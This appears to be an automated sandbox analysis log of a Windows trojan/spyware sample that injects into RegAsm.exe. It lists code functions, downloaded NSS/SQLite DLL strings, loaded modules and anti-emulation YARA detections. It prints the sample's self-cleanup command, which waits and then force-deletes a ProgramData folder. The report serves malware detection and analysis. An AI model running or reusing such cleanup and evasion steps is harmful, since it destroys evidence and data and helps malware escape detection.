                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E46403_2_6C6E4640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7156003_2_6C715600
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7376E33_2_6C7376E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72E6803_2_6C72E680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7077103_2_6C707710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7177A03_2_6C7177A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70F0703_2_6C70F070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6EC0E03_2_6C6EC0E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7350C73_2_6C7350C7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6F60A03_2_6C6F60A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73B1703_2_6C73B170
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7051903_2_6C705190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70E2F03_2_6C70E2F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6C22A03_2_6C6C22A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DC3703_2_6C6DC370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6C53403_2_6C6C5340
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70D3203_2_6C70D320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7353C83_2_6C7353C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CF3803_2_6C6CF380
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C77AC603_2_6C77AC60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C836C003_2_6C836C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7CECD03_2_6C7CECD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C84AC303_2_6C84AC30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C76ECC03_2_6C76ECC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C806D903_2_6C806D90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8FCDC03_2_6C8FCDC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8F8D203_2_6C8F8D20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C774DB03_2_6C774DB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C89AD503_2_6C89AD50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C83ED703_2_6C83ED70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C810EC03_2_6C810EC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C850E203_2_6C850E20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C77AEC03_2_6C77AEC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7F6E903_2_6C7F6E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C80EE703_2_6C80EE70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B8FB03_2_6C8B8FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7DEF403_2_6C7DEF40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C776F103_2_6C776F10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C84EFF03_2_6C84EFF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C770FE03_2_6C770FE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B0F203_2_6C8B0F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C77EFB03_2_6C77EFB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C832F703_2_6C832F70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7C08203_2_6C7C0820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7FA8203_2_6C7FA820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8768E03_2_6C8768E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8448403_2_6C844840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7A89603_2_6C7A8960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8009A03_2_6C8009A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C82A9A03_2_6C82A9A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8309B03_2_6C8309B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C88C9E03_2_6C88C9E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7C69003_2_6C7C6900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7A49F03_2_6C7A49F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7ECA703_2_6C7ECA70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C81EA003_2_6C81EA00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C828A303_2_6C828A30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7EEA803_2_6C7EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C810BA03_2_6C810BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C876BE03_2_6C876BE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C778BAC3_2_6C778BAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C89A4803_2_6C89A480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7884603_2_6C788460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7FA4303_2_6C7FA430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C80A4D03_2_6C80A4D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7D44203_2_6C7D4420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7B64D03_2_6C7B64D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7D25603_2_6C7D2560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7C85403_2_6C7C8540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C83A5E03_2_6C83A5E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7FE5F03_2_6C7FE5F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7645B03_2_6C7645B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8745403_2_6C874540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B85503_2_6C8B8550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8105703_2_6C810570
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7CC6503_2_6C7CC650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C80E6E03_2_6C80E6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7CE6E03_2_6C7CE6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7946D03_2_6C7946D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7F07003_2_6C7F0700
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C79A7D03_2_6C79A7D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7BE0703_2_6C7BE070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C84C0B03_2_6C84C0B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C83C0003_2_6C83C000
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 006E7D60 appears 53 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C793620 appears 44 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C8F09D0 appears 173 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C799B10 appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004024D7 appears 312 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C7094D0 appears 90 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C8FDAE0 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004180A8 appears 104 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C8FD930 appears 33 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C6FCBE8 appears 134 times
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.file.exe.70aac0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.70aac0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.6e0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/25@1/2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C727030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,3_2_6C727030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_004111BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004106C4 _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,3_2_004106C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199686524322[1].htmJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_03
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: .o0_2_006FE980
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                  Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
